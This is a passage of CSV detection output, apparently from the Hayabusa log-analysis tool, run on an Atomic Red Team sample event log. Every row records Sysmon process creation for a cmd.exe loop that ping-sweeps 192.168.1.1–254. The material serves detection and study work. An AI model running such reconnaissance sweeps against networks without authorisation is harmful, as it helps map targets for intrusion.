192.168.1.38 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:54.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.39 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:54.581 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.40 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:55.015 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.41 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:55.552 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.42 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:56.049 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.43 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:56.534 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.44 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:57.034 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.45 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:57.558 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.46 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:58.020 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.47 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:58.457 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.48 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:59.001 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.49 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:59.537 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.50 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:00.063 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.51 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:00.515 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.52 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:00.940 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.53 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:01.546 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.54 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:02.018 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.55 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:02.565 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.56 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:03.059 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.57 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:03.520 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.58 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:04.024 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.59 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:04.522 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.60 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:05.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.61 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:05.516 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.62 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:06.019 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.63 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:06.440 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.64 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:07.053 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.65 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:07.413 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.66 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:08.043 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.67 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:08.500 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.68 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:09.012 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.69 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:09.474 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.70 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:10.014 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.71 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:10.522 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.72 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:11.031 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.73 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:11.504 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.74 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:12.023 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.75 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:12.547 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.76 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:13.030 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.77 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:13.489 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.78 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:14.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.79 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:14.552 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.80 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:15.051 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.81 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:15.548 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.82 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:16.040 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.83 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:16.584 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.84 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:17.041 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.85 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:17.511 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.86 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:18.015 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.87 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:18.509 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.88 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:18.990 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.89 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:19.541 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.90 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:20.006 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.91 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:20.543 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.92 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:21.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.93 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 